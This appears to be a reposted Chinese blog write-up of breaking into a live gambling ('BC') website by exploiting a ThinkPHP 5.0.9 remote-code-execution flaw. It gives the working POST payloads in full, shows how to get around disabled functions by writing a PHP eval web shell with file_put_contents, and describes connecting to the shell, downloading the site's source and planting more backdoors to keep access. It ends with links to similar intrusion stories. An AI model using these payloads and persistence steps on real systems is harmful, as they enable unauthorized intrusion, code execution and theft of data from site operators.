简单的BC站点getshell

  • A+
所属分类:安全文章

最近来了点任务,做BC站,以前没做过只能碰碰运气!


确定目标

主站:

简单的BC站点getshell

通过旁站:

简单的BC站点getshell

信息收集

通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。

简单的BC站点getshell

直接通过payload进行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

简单的BC站点getshell

发现是php 5.4.45版本的,

直接尝试getshell:

简单的BC站点getshell

发现system被禁用,尝试其他系统命令的也一样。

简单的BC站点getshell

查看phpinfo中desable_functions禁用了那些函数。

简单的BC站点getshell

想办法怎么绕过进行写马(此处卡了我半天)

最后通过一位渗透小伙伴,想出下面的可以利用file_put_contents直接写shell,想了半天,忘了用其他函数进行直接写马就可以了,并不需要非得利用system命令进行写马,还是底层知识薄弱啊。再次感谢小伙伴!

简单的BC站点getshell

getshell

构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')

简单的BC站点getshell

写入成功,利用菜刀连接。

简单的BC站点getshell

成功连接。

查看权限:

简单的BC站点getshell

发现启动了远程安全模式。

想要绕过,发现很多函数被禁用,占未成功。

下载源码:

简单的BC站点getshell

多部署一些后门,防止被删。


文章转载先知社区

原文链接:https://xz.aliyun.com/t/9232

作者主页:https://xz.aliyun.com/u/35059

作者名称:Squirrels


相关文章参考:

记一次BC站实战渗透 | 从XSS到主机上线

记一次BC站实战渗透 | 从XSS到主机上线


记录一次实战拿bc网站的经历

http://www.yemogege.cn/wzaq-stwz/348.html


一次对BC网站的渗透测试

https://my.oschina.net/AdminTeam/blog/4683495


一兄弟被坑,我渗透进某BC的杀猪盘经历

https://my.oschina.net/u/4588149/blog/4421906


记一次较大的bc推广平台的渗透

https://my.oschina.net/u/4588149/blog/4716547


某群遇某产继而入侵某BC内网的奇妙故事

https://www.hackdoor.org/d/216-bc


简单的BC站点getshell

本文始发于微信公众号(Ots安全):简单的BC站点getshell

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: